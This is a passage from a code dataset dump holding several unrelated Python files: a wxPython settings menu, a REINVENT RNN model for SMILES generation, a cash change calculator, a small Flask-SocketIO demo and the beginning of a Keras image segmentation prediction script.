self.manager = manager\n\n self.Bind(wx.EVT_BUTTON, self.button_pressed)\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.erase_background)\n self.Bind(wx.EVT_PAINT, self.on_paint)\n\n self.sizer = wx.BoxSizer(wx.HORIZONTAL)\n self.buttons = Buttons(self, self.config)\n self.sizer.Add(self.buttons, 0, flag=wx.EXPAND | wx.ALL, border=20)\n self.SetSizer(self.sizer)\n self.Layout()\n\n def show_side_panel(self, idx):\n \"\"\"Shows selected menu panel.\"\"\"\n\n try:\n self.sizer.Detach(self.current_menu)\n self.current_menu.Destroy()\n except:\n pass\n finally:\n if idx == 0:\n self.current_menu = TitleMenu(self, self.config)\n elif idx == 1:\n self.current_menu = OptionsMenu(self, self.config)\n elif idx == 2:\n self.current_menu = WidgetsMenu(\n self, self.config, self.manager)\n\n self.sizer.Add(self.current_menu, proportion=1,\n flag=wx.EXPAND | wx.TOP | wx.BOTTOM | wx.RIGHT, border=20)\n self.Layout()\n\n def button_pressed(self, event):\n \"\"\"Handles button presses.\"\"\"\n\n operation = event.GetEventObject().label\n for switch in self.buttons.GetChildren():\n switch.isActive = False\n event.GetEventObject().isActive = False\n\n if operation == 'Return':\n wx.CallLater(100, self.manager.toggle_menu)\n\n elif operation == 'Quit':\n self.manager.save_widgets()\n wx.CallLater(100, self.parent.Destroy)\n\n elif operation == 'Options':\n\n if isinstance(self.current_menu, OptionsMenu):\n self.show_side_panel(0)\n else:\n event.GetEventObject().isActive = True\n self.show_side_panel(1)\n\n elif operation == 'Widgets':\n if isinstance(self.current_menu, WidgetsMenu):\n self.show_side_panel(0)\n else:\n event.GetEventObject().isActive = True\n self.show_side_panel(2)\n\n def erase_background(self, event):\n \"\"\"Reduces flicker.\"\"\"\n\n pass\n\n def on_paint(self, event):\n \"\"\"Handles refreshing.\"\"\"\n\n dc = wx.BufferedPaintDC(self)\n self.draw(dc)\n\n def draw(self, dc):\n \"\"\"Handles drawing.\"\"\"\n\n width, height = self.GetClientSize()\n dc.SetBackground(wx.Brush(self.config.get_color('panel')))\n dc.Clear()\n\n dc.SetPen(wx.Pen(self.config.get_color('border'), width=4))\n dc.SetBrush(wx.TRANSPARENT_BRUSH)\n dc.DrawRectangle(0, 0, width, height)\n dc.SetPen(wx.Pen(self.config.get_color('panel'), width=4))\n dc.DrawLine(3, 0, width - 6, 0)\n\n\nclass Buttons(wx.Panel):\n \"\"\"Constantly visible menu selection buttons panel.\"\"\"\n\n def __init__(self, parent, config, **kwargs):\n super(wx.Panel, self).__init__(parent=parent)\n\n self.Name = 'menuPanel'\n self.parent = parent\n self.config = config\n\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.erase_background)\n self.Bind(wx.EVT_PAINT, self.on_paint)\n self.Bind(wx.EVT_BUTTON, self.button_pressed)\n\n self.display()\n\n def display(self):\n \"\"\"Displays buttons.\"\"\"\n\n self.sizer = wx.GridBagSizer(0, 0)\n butt1 = MenuPanelSwitchButton(\n self, self.config, 'Return', size=(240, 60))\n butt2 = MenuPanelSwitchButton(\n self, self.config, 'Quit', size=(240, 60))\n butt3 = MenuPanelSwitchButton(\n self, self.config, 'Widgets', size=(240, 60))\n butt4 = MenuPanelSwitchButton(\n self, self.config, 'Options', size=(240, 60))\n\n self.sizer.Add(butt3, pos=(0, 0), flag=wx.EXPAND |\n wx.TOP | wx.LEFT | wx.RIGHT, border=10)\n self.sizer.Add(butt4, pos=(1, 0), flag=wx.EXPAND |\n wx.TOP | wx.LEFT | wx.RIGHT, border=10)\n self.sizer.Add(butt1, pos=(2, 0), flag=wx.EXPAND |\n wx.TOP | wx.LEFT | wx.RIGHT, border=10)\n self.sizer.Add(butt2, pos=(4, 0), flag=wx.EXPAND | wx.ALL, border=10)\n self.sizer.AddGrowableRow(3)\n\n self.SetSizer(self.sizer)\n self.Layout()\n\n def button_pressed(self, event):\n \"\"\"Skips all button presses to menu container.\"\"\"\n\n event.Skip()\n\n def erase_background(self, event):\n \"\"\"Reduces flicker\"\"\"\n\n pass\n\n def on_paint(self, event):\n \"\"\"Handles refreshing.\"\"\"\n\n dc = wx.BufferedPaintDC(self)\n self.draw(dc)\n\n def draw(self, dc):\n \"\"\"Handles drawing.\"\"\"\n\n width, height = self.GetClientSize()\n dc.SetBackground(wx.Brush(self.config.get_color('menu')))\n dc.Clear()\n\n dc.SetPen(wx.Pen(self.config.get_color('border'), width=4))\n dc.SetBrush(wx.TRANSPARENT_BRUSH)\n dc.DrawRectangle(0, 0, width, height)\n\n\nclass TitleMenu(wx.Panel):\n \"\"\"Default menu panel, displays application name.\"\"\"\n\n def __init__(self, parent, config):\n super(wx.Panel, self).__init__(parent)\n self.config = config\n\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.erase_background)\n self.Bind(wx.EVT_PAINT, self.on_paint)\n\n def erase_background(self, event):\n \"\"\"Reduces flicker.\"\"\"\n\n pass\n\n def on_paint(self, event):\n \"\"\"Handles refreshing.\"\"\"\n\n dc = wx.BufferedPaintDC(self)\n self.draw(dc)\n\n def draw(self, dc):\n \"\"\"Handles drawing.\"\"\"\n\n width, height = self.GetClientSize()\n\n dc.SetBackground(wx.Brush(self.config.get_color('menu')))\n dc.Clear()\n\n dc.SetPen(wx.Pen(self.config.get_color('border'), width=4))\n dc.SetBrush(wx.TRANSPARENT_BRUSH)\n dc.DrawRectangle(0, 0, width, height)\n\n dc.SetFont(wx.Font(50, wx.FONTFAMILY_DECORATIVE,\n wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD))\n dc.SetTextForeground(self.config.get_color('text'))\n\n textWidth, textHeight = dc.GetTextExtent('SciEnv')\n textX = (width - textWidth) / 2\n textY = (height - textHeight) / 3\n\n dc.DrawText('SciEnv', (textX, textY))\n\n\nclass OptionsMenu(wx.Panel):\n\n def __init__(self, parent, config):\n super().__init__(parent=parent)\n\n self.parent = parent\n self.config = config\n\n self.SetBackgroundColour(self.config.get_color('menu'))\n\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.erase_background)\n self.Bind(wx.EVT_PAINT, self.on_paint)\n self.Bind(wx.EVT_BUTTON, self.button_pressed)\n\n self.display()\n\n def display(self):\n \"\"\"Displays configuration panel and buttons.\"\"\"\n\n sizer = wx.GridBagSizer()\n self.config_panel = OptionsConfigPanel(self, self.config)\n reset_button = SimpleButton(\n parent=self, config=self.config, label='Reset Settings', size=(40, 40))\n save_button = SimpleButton(\n parent=self, config=self.config, label='Save Changes', size=(40, 40))\n cancel_button = SimpleButton(\n parent=self, config=self.config, label='Cancel', size=(40, 40))\n\n sizer.Add(self.config_panel, pos=(0, 0), span=(8, 10),\n flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=4)\n sizer.Add(reset_button, pos=(8, 0), span=(1, 3),\n flag=wx.EXPAND | wx.ALL, border=10)\n sizer.Add(cancel_button, pos=(8, 6), span=(1, 2),\n flag=wx.EXPAND | wx.ALL, border=10)\n sizer.Add(save_button, pos=(8, 8), span=(1, 2), flag=wx.EXPAND |\n wx.TOP | wx.BOTTOM | wx.RIGHT, border=10)\n\n for i in range(10):\n sizer.AddGrowableCol(i)\n for i in range(8):\n sizer.AddGrowableRow(i)\n\n self.SetSizer(sizer)\n self.Layout()\n\n def button_pressed(self, e):\n button = e.GetEventObject()\n operation = button.label\n if operation == 'Save Changes':\n self.config = self.config_panel.collect_config(self.config)\n self.config.write_config()\n self.GetParent().GetParent().Refresh()\n self.GetParent().GetParent().Layout()\n elif operation == 'Cancel':\n return\n elif operation == 'Reset Settings':\n return\n\n def erase_background(self, e):\n \"\"\"Reduces flicker.\"\"\"\n\n pass\n\n def on_paint(self, e):\n \"\"\"Handles refreshing.\"\"\"\n\n dc = wx.BufferedPaintDC(self)\n self.draw(dc)\n\n def draw(self, dc):\n \"\"\"Handles drawing.\"\"\"\n\n dc.SetBackground(wx.Brush(self.config.get_color('menu')))\n dc.Clear()\n\n width, height = self.GetClientSize()\n\n dc.SetPen(wx.Pen(self.config.get_color('border'), width=4))\n dc.SetBrush(wx.TRANSPARENT_BRUSH)\n dc.DrawRectangle(0, 0, width, height)\n\n\nclass OptionsConfigPanel(ScrolledPanel):\n\n def __init__(self, parent, config):\n super().__init__(parent)\n self.config = config\n\n self.SetBackgroundColour(self.config.get_color('menu'))\n\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.erase_background)\n self.Bind(wx.EVT_PAINT, self.on_paint)\n\n self.display()\n self.setup_scrolling(scroll_x=False)\n\n def display(self):\n \"\"\"Handles display.\"\"\"\n\n sizer = wx.GridBagSizer()\n\n header = ScaledStaticText(self,\n label='Settings',\n font=self.config.get_font('large'),\n conf=self.config)\n text1 = ScaledStaticText(self,\n label='Theme: ',\n font=self.config.get_font('medium'),\n conf=self.config)\n self.theme_selection = wx.Choice(self,\n choices=self.config.get_theme_list(),\n size=(120, 40))\n add_themes = SimpleButton(self,\n label='Add New Theme',\n config=self.config,\n size=(120, 40))\n\n self.save_widgets = CheckBox(\n self, 'Save Widgets//On Exit', self.config.save_widgets_on_exit, self.config)\n\n text2 = ScaledStaticText(self,\n label='Small Font',\n font=self.config.get_font('medium'),\n conf=self.config)\n text3 = ScaledStaticText(self,\n label='Medium Font',\n font=self.config.get_font('medium'),\n conf=self.config)\n text4 = ScaledStaticText(self,\n label='Large Font',\n font=self.config.get_font('medium'),\n conf=self.config)\n\n self.font_picker_small = wx.FontPickerCtrl(\n self, font=self.config.get_font('small'), size=(200, 40))\n self.font_picker_medium = wx.FontPickerCtrl(\n self, font=self.config.get_font('medium'), size=(200, 40))\n self.font_picker_large = wx.FontPickerCtrl(\n self, font=self.config.get_font('large'), size=(200, 40))\n self.font_picker_small.SetBackgroundColour(\n self.config.get_color('menu'))\n self.font_picker_medium.SetBackgroundColour(\n self.config.get_color('menu'))\n self.font_picker_large.SetBackgroundColour(\n self.config.get_color('menu'))\n\n for index, theme in enumerate(self.theme_selection.GetItems()):\n if theme == self.config.get_current_theme():\n self.theme_selection.SetSelection(index)\n break\n\n sizer.Add(header, pos=(0, 0), span=(1, 2),\n flag=wx.EXPAND | wx.ALL, border=60)\n sizer.Add(text1, pos=(1, 0), flag=wx.EXPAND | wx.LEFT, border=20)\n sizer.Add(self.theme_selection, pos=(1, 1),\n flag=wx.EXPAND | wx.RIGHT, border=40)\n sizer.Add(add_themes, pos=(2, 1), flag=wx.EXPAND | wx.RIGHT, border=40)\n sizer.Add((-1, 60), pos=(3, 0), span=(1, 2), flag=wx.EXPAND)\n sizer.Add(text2, pos=(4, 0), flag=wx.EXPAND | wx.LEFT, border=20)\n sizer.Add(text3, pos=(5, 0), flag=wx.EXPAND | wx.LEFT, border=20)\n sizer.Add(text4, pos=(6, 0), flag=wx.EXPAND | wx.LEFT, border=20)\n sizer.Add(self.font_picker_small, pos=(4, 1),\n flag=wx.EXPAND | wx.RIGHT, border=40)\n sizer.Add(self.font_picker_medium, pos=(5, 1),\n flag=wx.EXPAND | wx.RIGHT, border=40)\n sizer.Add(self.font_picker_large, pos=(6, 1),\n flag=wx.EXPAND | wx.RIGHT, border=40)\n sizer.Add((-1, 60), pos=(7, 0), span=(1, 2), flag=wx.EXPAND)\n sizer.Add(self.save_widgets, pos=(8, 0), flag=wx.EXPAND)\n\n for i in range(2):\n sizer.AddGrowableCol(i)\n\n self.SetSizer(sizer)\n self.Layout()\n\n def collect_config(self, config):\n \"\"\"Collects all the configuration across the panels' children.\"\"\"\n\n config._config.set('General', 'Theme', self.theme_selection.GetString(\n self.theme_selection.GetSelection()))\n do_save_widgets = 'yes' if self.save_widgets.value else 'no'\n config._config.set('General', 'savewidgetsonexit', do_save_widgets)\n small_font = self.font_picker_small.GetSelectedFont()\n medium_font = self.font_picker_medium.GetSelectedFont()\n large_font = self.font_picker_large.GetSelectedFont()\n config.set_font('Small Font',\n small_font.GetPointSize(),\n small_font.GetFamily(),\n small_font.GetStyle(),\n small_font.GetWeight())\n config.set_font('Medium Font',\n medium_font.GetPointSize(),\n medium_font.GetFamily(),\n medium_font.GetStyle(),\n medium_font.GetWeight())\n config.set_font('Large Font',\n large_font.GetPointSize(),\n large_font.GetFamily(),\n large_font.GetStyle(),\n large_font.GetWeight())\n return config\n\n def erase_background(self, e):\n \"\"\"Remove flicker.\"\"\"\n\n pass\n\n def on_paint(self, e):\n \"\"\"Handles refreshing.\"\"\"\n\n dc = wx.BufferedPaintDC(self)\n self.draw(dc)\n\n def draw(self, dc):\n \"\"\"Handles drawing.\"\"\"\n\n dc.SetBackground(wx.Brush(self.config.get_color('menu')))\n dc.Clear()\n\n\nclass WidgetsMenu(wx.Panel):\n\n def __init__(self, parent, config, manager):\n super().__init__(parent=parent)\n\n self.parent = parent\n self.config = config\n self.manager = manager\n\n widgets = os.listdir(PATH)\n if not widgets:\n self.widget_panel = NoWidgetsPanel(self, self.config)\n else:\n self.widget_panel = EmptyPanel(self, self.config)\n\n self.SetBackgroundColour(self.config.get_color('menu'))\n\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.erase_background)\n self.Bind(wx.EVT_PAINT, self.on_paint)\n self.Bind(wx.EVT_BUTTON, self.button_pressed)\n\n self.display()\n\n def display(self):\n\n self.sizer = wx.GridBagSizer()\n\n self.widget_list = WidgetsList(self, self.config, self.manager)\n self.button = SimpleButton(\n self, label='Download Widgets', config=self.config, size=(200, 40))\n\n self.sizer.Add(self.widget_list, pos=(0, 0), span=(7, 2),\n flag=wx.EXPAND | wx.TOP | wx.BOTTOM | wx.LEFT, border=10)\n self.sizer.Add(self.widget_panel, pos=(0, 2), span=(8, 8), \n flag=wx.EXPAND | wx.ALL, border=10)\n self.sizer.Add(self.button, pos=(7, 0), span=(1, 2),\n flag=wx.EXPAND | wx.BOTTOM | wx.LEFT, border=10)\n\n for i in range(7):\n self.sizer.AddGrowableRow(i)\n for i in range(2, 10):\n self.sizer.AddGrowableCol(i)\n\n self.SetSizer(self.sizer)\n self.Layout()\n\n def button_pressed(self, e):\n pass\n\n def erase_background(self, e):\n \"\"\"Reduces flicker.\"\"\"\n\n pass\n\n def on_paint(self, e):\n \"\"\"Handles refreshing.\"\"\"\n\n dc = wx.BufferedPaintDC(self)\n self.draw(dc)\n\n def draw(self, dc):\n \"\"\"Handles drawing.\"\"\"\n\n dc.SetBackground(wx.Brush(self.config.get_color('menu')))\n dc.Clear()\n\n width, height = self.GetClientSize()\n\n dc.SetPen(wx.Pen(self.config.get_color('border'), width=4))\n dc.SetBrush(wx.TRANSPARENT_BRUSH)\n dc.DrawRectangle(0, 0, width, height)\n\n\nclass NoWidgetsPanel(wx.Panel):\n\n def __init__(self, parent, config):\n super().__init__(parent)\n\n self.config = config\n text1 = ScaledStaticText(self, \n label='No widgets installed.', \n font=self.config.get_font('large'),\n conf=self.config)\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(text1, 1, flag=wx.EXPAND|wx.ALL, border=20)\n self.SetSizer(sizer)\n self.Layout()\n\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.erase_background)\n self.Bind(wx.EVT_PAINT, self.on_paint)\n\n def erase_background(self, e):\n pass\n\n def on_paint(self, e):\n dc = wx.BufferedPaintDC(self)\n self.draw(dc)\n\n def draw(self, dc):\n dc.SetBackground(wx.Brush(self.config.get_color('menu')))\n dc.Clear()\n\n\nclass EmptyPanel(wx.Panel):\n\n def __init__(self, parent, config):\n super().__init__(parent)\n\n self.SetBackgroundColour(config.get_color('menu'))","sub_path":"scienv/core/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":18387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"467774587","text":"\"\"\"\r\nImplementation of the RNN model\r\n\"\"\"\r\nfrom typing import List, Tuple\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn as tnn\r\nimport torch.nn.functional as tnnf\r\n\r\nfrom reinvent_models.reinvent_core.models import vocabulary as mv\r\n\r\n# from models import vocabulary as mv\r\n\r\n\r\nclass RNN(tnn.Module):\r\n \"\"\"\r\n Implements a N layer GRU(M) cell including an embedding layer\r\n and an output linear layer back to the size of the vocabulary\r\n \"\"\"\r\n\r\n def __init__(\r\n self,\r\n voc_size,\r\n layer_size=512,\r\n num_layers=3,\r\n cell_type=\"gru\",\r\n embedding_layer_size=256,\r\n dropout=0.0,\r\n layer_normalization=False,\r\n ):\r\n \"\"\"\r\n Implements a N layer GRU|LSTM cell including an embedding layer and an output linear layer back to the size of the\r\n vocabulary\r\n :param voc_size: Size of the vocabulary.\r\n :param layer_size: Size of each of the RNN layers.\r\n :param num_layers: Number of RNN layers.\r\n :param embedding_layer_size: Size of the embedding layer.\r\n \"\"\"\r\n super(RNN, self).__init__()\r\n\r\n self._layer_size = layer_size\r\n self._embedding_layer_size = embedding_layer_size\r\n self._num_layers = num_layers\r\n self._cell_type = cell_type.lower()\r\n self._dropout = dropout\r\n self._layer_normalization = layer_normalization\r\n\r\n self._embedding = tnn.Embedding(voc_size, self._embedding_layer_size)\r\n if self._cell_type == \"gru\":\r\n self._rnn = tnn.GRU(\r\n self._embedding_layer_size,\r\n self._layer_size,\r\n num_layers=self._num_layers,\r\n dropout=self._dropout,\r\n batch_first=True,\r\n )\r\n elif self._cell_type == \"lstm\":\r\n self._rnn = tnn.LSTM(\r\n self._embedding_layer_size,\r\n self._layer_size,\r\n num_layers=self._num_layers,\r\n dropout=self._dropout,\r\n batch_first=True,\r\n )\r\n else:\r\n raise ValueError(\r\n 'Value of the parameter cell_type should be \"gru\" or \"lstm\"'\r\n )\r\n self._linear = tnn.Linear(self._layer_size, voc_size)\r\n\r\n def forward(self, input_vector, hidden_state=None): # pylint: disable=W0221\r\n \"\"\"\r\n Performs a forward pass on the model. Note: you pass the **whole** sequence.\r\n :param input_vector: Input tensor (batch_size, seq_size).\r\n :param hidden_state: Hidden state tensor.\r\n \"\"\"\r\n batch_size, seq_size = input_vector.size()\r\n if hidden_state is None:\r\n size = (self._num_layers, batch_size, self._layer_size)\r\n if self._cell_type == \"gru\":\r\n hidden_state = torch.zeros(*size)\r\n else:\r\n hidden_state = [torch.zeros(*size), torch.zeros(*size)]\r\n embedded_data = self._embedding(input_vector) # (batch,seq,embedding)\r\n output_vector, hidden_state_out = self._rnn(embedded_data, hidden_state)\r\n\r\n if self._layer_normalization:\r\n output_vector = tnnf.layer_norm(output_vector, output_vector.size()[1:])\r\n output_vector = output_vector.reshape(-1, self._layer_size)\r\n\r\n output_data = self._linear(output_vector).view(batch_size, seq_size, -1)\r\n\r\n return output_data, hidden_state_out\r\n\r\n def get_params(self):\r\n \"\"\"\r\n Returns the configuration parameters of the model.\r\n \"\"\"\r\n return {\r\n \"dropout\": self._dropout,\r\n \"layer_size\": self._layer_size,\r\n \"num_layers\": self._num_layers,\r\n \"cell_type\": self._cell_type,\r\n \"embedding_layer_size\": self._embedding_layer_size,\r\n }\r\n\r\n\r\nclass Model:\r\n \"\"\"\r\n Implements an RNN model using SMILES.\r\n \"\"\"\r\n\r\n def __init__(\r\n self,\r\n vocabulary: mv.Vocabulary,\r\n tokenizer,\r\n network_params=None,\r\n max_sequence_length=256,\r\n no_cuda=False,\r\n ):\r\n \"\"\"\r\n Implements an RNN.\r\n :param vocabulary: Vocabulary to use.\r\n :param tokenizer: Tokenizer to use.\r\n :param network_params: Dictionary with all parameters required to correctly initialize the RNN class.\r\n :param max_sequence_length: The max size of SMILES sequence that can be generated.\r\n \"\"\"\r\n self.vocabulary = vocabulary\r\n self.tokenizer = tokenizer\r\n self.max_sequence_length = max_sequence_length\r\n\r\n if not isinstance(network_params, dict):\r\n network_params = {}\r\n\r\n self.network = RNN(len(self.vocabulary), **network_params)\r\n if torch.cuda.is_available() and not no_cuda:\r\n self.network.cuda()\r\n\r\n self._nll_loss = tnn.NLLLoss(reduction=\"none\")\r\n\r\n @classmethod\r\n def load_from_file(cls, file_path: str, sampling_mode=False):\r\n \"\"\"\r\n Loads a model from a single file\r\n :param file_path: input file path\r\n :return: new instance of the RNN or an exception if it was not possible to load it.\r\n \"\"\"\r\n if torch.cuda.is_available():\r\n save_dict = torch.load(file_path)\r\n else:\r\n save_dict = torch.load(file_path, map_location=lambda storage, loc: storage)\r\n\r\n network_params = save_dict.get(\"network_params\", {})\r\n model = Model(\r\n vocabulary=save_dict[\"vocabulary\"],\r\n tokenizer=save_dict.get(\"tokenizer\", mv.SMILESTokenizer()),\r\n network_params=network_params,\r\n max_sequence_length=save_dict[\"max_sequence_length\"],\r\n )\r\n model.network.load_state_dict(save_dict[\"network\"])\r\n if sampling_mode:\r\n model.network.eval()\r\n return model\r\n\r\n def save(self, file: str):\r\n \"\"\"\r\n Saves the model into a file\r\n :param file: it's actually a path\r\n \"\"\"\r\n save_dict = {\r\n \"vocabulary\": self.vocabulary,\r\n \"tokenizer\": self.tokenizer,\r\n \"max_sequence_length\": self.max_sequence_length,\r\n \"network\": self.network.state_dict(),\r\n \"network_params\": self.network.get_params(),\r\n }\r\n torch.save(save_dict, file)\r\n\r\n def likelihood_smiles(self, smiles) -> torch.Tensor:\r\n tokens = [self.tokenizer.tokenize(smile) for smile in smiles]\r\n encoded = [self.vocabulary.encode(token) for token in tokens]\r\n sequences = [torch.tensor(encode, dtype=torch.long) for encode in encoded]\r\n\r\n def collate_fn(encoded_seqs):\r\n \"\"\"Function to take a list of encoded sequences and turn them into a batch\"\"\"\r\n max_length = max([seq.size(0) for seq in encoded_seqs])\r\n collated_arr = torch.zeros(\r\n len(encoded_seqs), max_length, dtype=torch.long\r\n ) # padded with zeroes\r\n for i, seq in enumerate(encoded_seqs):\r\n collated_arr[i, : seq.size(0)] = seq\r\n return collated_arr\r\n\r\n padded_sequences = collate_fn(sequences)\r\n return self.likelihood(padded_sequences)\r\n\r\n def likelihood(self, sequences) -> torch.Tensor:\r\n \"\"\"\r\n Retrieves the likelihood of a given sequence. Used in training.\r\n\r\n :param sequences: (batch_size, sequence_length) A batch of sequences\r\n :return: (batch_size) Log likelihood for each example.\r\n \"\"\"\r\n logits, _ = self.network(sequences[:, :-1]) # all steps done at once\r\n log_probs = logits.log_softmax(dim=2)\r\n return self._nll_loss(log_probs.transpose(1, 2), sequences[:, 1:]).sum(dim=1)\r\n\r\n def sample_smiles(self, num=128, batch_size=128) -> Tuple[List, np.array]:\r\n \"\"\"\r\n Samples n SMILES from the model.\r\n :param num: Number of SMILES to sample.\r\n :param batch_size: Number of sequences to sample at the same time.\r\n :return:\r\n :smiles: (n) A list with SMILES.\r\n :likelihoods: (n) A list of likelihoods.\r\n \"\"\"\r\n batch_sizes = [batch_size for _ in range(num // batch_size)] + [\r\n num % batch_size\r\n ]\r\n smiles_sampled = []\r\n likelihoods_sampled = []\r\n\r\n for size in batch_sizes:\r\n if not size:\r\n break\r\n seqs, likelihoods = self._sample(batch_size=size)\r\n smiles = [\r\n self.tokenizer.untokenize(self.vocabulary.decode(seq))\r\n for seq in seqs.cpu().numpy()\r\n ]\r\n\r\n smiles_sampled.extend(smiles)\r\n likelihoods_sampled.append(likelihoods.data.cpu().numpy())\r\n\r\n del seqs, likelihoods\r\n return smiles_sampled, np.concatenate(likelihoods_sampled)\r\n\r\n def sample_sequences_and_smiles(\r\n self, batch_size=128\r\n ) -> Tuple[torch.Tensor, List, torch.Tensor]:\r\n seqs, likelihoods = self._sample(batch_size=batch_size)\r\n smiles = [\r\n self.tokenizer.untokenize(self.vocabulary.decode(seq))\r\n for seq in seqs.cpu().numpy()\r\n ]\r\n return seqs, smiles, likelihoods\r\n\r\n # @torch.no_grad()\r\n def _sample(self, batch_size=128) -> Tuple[torch.Tensor, torch.Tensor]:\r\n start_token = torch.zeros(batch_size, dtype=torch.long)\r\n start_token[:] = self.vocabulary[\"^\"]\r\n input_vector = start_token\r\n sequences = [\r\n self.vocabulary[\"^\"] * torch.ones([batch_size, 1], dtype=torch.long)\r\n ]\r\n # NOTE: The first token never gets added in the loop so the sequences are initialized with a start token\r\n hidden_state = None\r\n nlls = torch.zeros(batch_size)\r\n for _ in range(self.max_sequence_length - 1):\r\n logits, hidden_state = self.network(input_vector.unsqueeze(1), hidden_state)\r\n logits = logits.squeeze(1)\r\n probabilities = logits.softmax(dim=1)\r\n log_probs = logits.log_softmax(dim=1)\r\n input_vector = torch.multinomial(probabilities, 1).view(-1)\r\n sequences.append(input_vector.view(-1, 1))\r\n nlls += self._nll_loss(log_probs, input_vector)\r\n if input_vector.sum() == 0:\r\n break\r\n\r\n sequences = torch.cat(sequences, 1)\r\n return sequences.data, nlls\r\n\r\n def get_network_parameters(self):\r\n return self.network.parameters()\r\n","sub_path":"reinvent_models/reinvent_core/models/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"646890199","text":"\n\ndef bills(charge, payment):\n #next two lines turn floats to ints for coin calc later\n bills_charge = int(charge)\n bills_payment = int(payment)\n bills_tuple = ()\n #calculating coins for rounding errors that can occur - rounding the float to 2 points in the process\n coins_payment = round((payment - bills_payment), 2)\n coins_charge = round((charge - bills_charge), 2)\n #following if statement checks for need for \"rounding\"\n if coins_payment < coins_charge:\n bills_charge += 1\n # setting change up for the next if statements\n change = bills_payment - bills_charge\n #following if/else statements see if certain bills are needed, subtracts them from total, and adds number of bills needed to tuple - else statements add 0's to tuple after change = 0\n if change / 100 > 0:\n hund = (change - (change % 100))/100\n bills_tuple = bills_tuple + (int(hund),)\n change -= 100 * hund\n else:\n bills_tuple = bills_tuple + (0,)\n if change / 50 > 0:\n fifty = (change - (change % 50))/50\n bills_tuple = bills_tuple + (int(fifty),)\n change -= 50 * fifty\n else:\n bills_tuple = bills_tuple + (0,)\n if change / 20 > 0:\n twenty = (change - (change % 20))/20\n bills_tuple = bills_tuple + (int(twenty),)\n change -= 20 * twenty\n else:\n bills_tuple = bills_tuple + (0,)\n if change / 10 > 0:\n tens = (change - (change % 10))/10\n bills_tuple = bills_tuple + (int(tens),)\n change -= 10 * tens\n else:\n bills_tuple = bills_tuple + (0,)\n if change / 5 > 0:\n fives = (change - (change % 5))/5\n bills_tuple = bills_tuple + (int(fives),)\n change -= 5 * fives\n else:\n bills_tuple = bills_tuple + (0,)\n if change / 1 > 0:\n singles = (change - (change % 1))\n bills_tuple = bills_tuple + (int(singles),)\n change -= 1 * singles\n else:\n bills_tuple = bills_tuple + (0,)\n return(bills_tuple)\n \ndef coins(charge, payment): \n coins_tuple = ()\n #2 lines below gives me whole number of bills - converts float to int\n bills_charge = int(charge) \n bills_payment = int(payment) \n #next 2 give me change by subtracting bills from total amt given and rounding float to 2 places\n coins_payment = round((payment - bills_payment), 2)\n coins_charge = round((charge - bills_charge), 2)\n #next if/elif check payment/charge amount and see if i need to add 1 so that the change can be proper (accounting for situations where you could give too much change because of bill amt being 10 but really needing 9.75 for example)\n if coins_payment < coins_charge:\n coins_payment += 1\n coins = int((coins_payment - coins_charge) * 100)\n elif coins_payment >= coins_charge:\n coins = int((coins_payment - coins_charge) * 100)\n #following if statements find which coinns are needed, what amounts, and then add said amount to the tuple - else statements add 0 to tuple once coins equals 0\n if coins / 25 > 0:\n quarters = (coins - (coins % 25))/25\n coins_tuple = coins_tuple + (int(quarters),)\n coins -= 25 * quarters\n else:\n coins_tuple = coins_tuple + (0,)\n if coins / 10 > 0:\n dimes = (coins - (coins % 10))/10\n coins_tuple = coins_tuple + (int(dimes),)\n coins -= 10 * dimes\n else:\n coins_tuple = coins_tuple + (0,)\n if coins / 5 > 0:\n nickles = (coins - (coins % 5))/5\n coins_tuple = coins_tuple + (int(nickles),)\n coins -= 5 * nickles\n else:\n coins_tuple = coins_tuple + (0,)\n if coins / 1 > 0:\n pennies = (coins - (coins % 1))\n coins_tuple = coins_tuple + (int(pennies),)\n coins -= 1 * pennies\n else:\n coins_tuple = coins_tuple + (0,)\n return(coins_tuple)\n\ndef change_calc(charge_amt, payment_amt):\n charge = charge_amt\n payment = payment_amt\n return(bills(charge, payment), coins(charge, payment))\n\nprint(change_calc(90.51, 100.49))\n\n\n","sub_path":"change_maker.py","file_name":"change_maker.py","file_ext":"py","file_size_in_byte":4025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"475151641","text":"import time\nimport random\nfrom flask import Flask, render_template\nfrom flask_socketio import SocketIO, emit\n\napp = Flask(__name__)\nsocketio = SocketIO(app)\n\n\n@app.route('/')\ndef sessions():\n return render_template('index.html')\n\n\n@socketio.on('sendData')\ndef handle_my_custom_event(json):\n emit('serverResponse', {'timestamp': time.time(), 'data': random.randint(0, 10)})\n\n\nif __name__ == '__main__':\n socketio.run(app, debug=True)\n","sub_path":"Labs/P6/Starting code/EX_1/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"463645640","text":"import sys\nimport argparse\nimport glob\nimport random\n\nimport Models , LoadBatches\n\nimport cv2\nimport numpy as np\n\nfrom keras.models import load_model\n#from tqdm import tqdm\n\n\ndef parse(argv):\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"--save_weights_path\", type = str, default = \"\" )\n\tparser.add_argument(\"--epoch_number\", type = int, default = 5 )\n\tparser.add_argument(\"--test_images\", type = str , default = \"\")\n\tparser.add_argument(\"--output_path\", type = str , default = \"\")\n\tparser.add_argument(\"--input_height\", type=int , default = 224 )\n\tparser.add_argument(\"--input_width\", type=int , default = 224 )\n\tparser.add_argument(\"--model_name\", type = str , default = \"\")\n\tparser.add_argument(\"--n_classes\", type=int )\n\n\treturn parser.parse_args(argv)\n\n\ndef predict(args):\n\t\n\tsave_weights_path = 